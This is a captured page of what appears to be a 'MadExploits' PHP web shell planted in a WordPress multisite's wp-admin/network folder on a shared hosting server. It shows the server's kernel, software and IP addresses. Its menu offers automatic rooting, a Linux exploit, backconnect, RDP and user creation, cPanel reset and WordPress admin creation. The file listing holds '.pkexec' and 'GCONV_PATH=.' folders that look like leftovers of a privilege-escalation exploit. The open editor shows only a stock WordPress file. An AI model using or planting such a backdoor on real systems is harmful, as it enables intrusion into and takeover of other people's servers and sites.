Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.118.12.102
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
bestdealsmart.com /
wp-admin /
network /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
about.php
245
B
-rw-r--r--
admin.php
1
KB
-rw-r--r--
contribute.php
255
B
-rw-r--r--
credits.php
249
B
-rw-r--r--
edit.php
908
B
-rw-r--r--
freedoms.php
251
B
-rw-r--r--
index.php
2.84
KB
-rw-r--r--
menu.php
4.63
KB
-rw-r--r--
plugin-editor.php
266
B
-rw-r--r--
plugin-install.php
377
B
-rw-r--r--
plugins.php
249
B
-rw-r--r--
privacy.php
249
B
-rw-r--r--
profile.php
254
B
-rw-r--r--
settings.php
21.46
KB
-rw-r--r--
setup.php
247
B
-rw-r--r--
site-info.php
7.59
KB
-rw-r--r--
site-new.php
9.35
KB
-rw-r--r--
site-settings.php
5.49
KB
-rw-r--r--
site-themes.php
6.71
KB
-rw-r--r--
site-users.php
10.82
KB
-rw-r--r--
sites.php
13.26
KB
-rw-r--r--
theme-editor.php
264
B
-rw-r--r--
theme-install.php
374
B
-rw-r--r--
themes.php
15.62
KB
-rw-r--r--
update-core.php
253
B
-rw-r--r--
update.php
450
B
-rw-r--r--
upgrade.php
4.85
KB
-rw-r--r--
user-edit.php
253
B
-rw-r--r--
user-new.php
5.12
KB
-rw-r--r--
users.php
9.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : plugin-install.php
<?php /** * Install plugin network administration panel. * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ if ( isset( $_GET['tab'] ) && ( 'plugin-information' === $_GET['tab'] ) ) { define( 'IFRAME_REQUEST', true ); } /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/plugin-install.php';
Close